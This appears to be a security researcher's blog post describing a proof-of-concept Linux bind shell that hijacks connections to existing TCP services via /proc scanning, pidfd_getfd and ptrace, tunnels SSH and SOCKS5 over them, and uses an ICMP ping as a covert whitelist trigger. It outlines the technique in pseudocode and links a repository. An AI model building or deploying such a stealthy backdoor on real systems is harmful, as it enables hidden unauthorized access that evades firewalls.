# tl;dr This post presents an approach to implementing bind shells with connection hijacking as alternatives to common webshells. The PoC is a simple bind shell with SOCKS5 capabilities that hijacks incoming connections to TCP services instead of listening on its own. It does this by scanning the `/proc` filesystem for connections from whitelisted IPs and using the `pidfd_getfd` Linux syscall to duplicate the file descriptor for the connection. available at https://github.com/zimnyaa/nowebshell # why There are several advantages to the approach both over webshells and regular bind shells: - webshells require writing in web languages, which I did not want to do - webshells with SOCKS proxies are slow - bind shells get firewalled off, and are extremely noticeable # why not There are several disadvantages, too. The most notable is the fact that `netstat` reports who owns the connection truthfully: >![[Pasted image 20240603200821.png]] >*netstat output* The other important downside are stability issues in processes who try operating on closed file descriptors. Some handle it gracefully, but i.e. the `updog` Python module does not process the exception and crashes: >![[Pasted image 20240603201002.png]] >*someone does not handle closed descriptors* # how The execution loop of the shell is simple: ```j scan processes and filter by commandline -> scan open sockets to find connections with whitelisted IPs -> clone the fd of the socket connection with pidfd_procfd -> ptrace_do a close() syscall on the fd in the donor process -> bind a reverse SSH connection to the socket ``` The PoC uses github.com/oraoto/go-pidfd for Go `pidfd` syscall bindings and https://github.com/briceburg/fdclose/ and `ptrace_do` for closing the file descriptor in another process. Meanwhile, a separate listener in the background updates the whitelist based on a hardcoded key, delivered in an ICMP Echo request. # usage The usage is pretty straightforward: >![[Pasted image 20240603201427.png]] >default nginx installation >![[Pasted image 20240603201433.png]] >running the thing >![[Pasted image 20240603201549.png]] >the client sends a ping to whitelist itself and makes a connection >![[Pasted image 20240603201645.png]] >a SSH connection is created over it (see [[grpcssh]])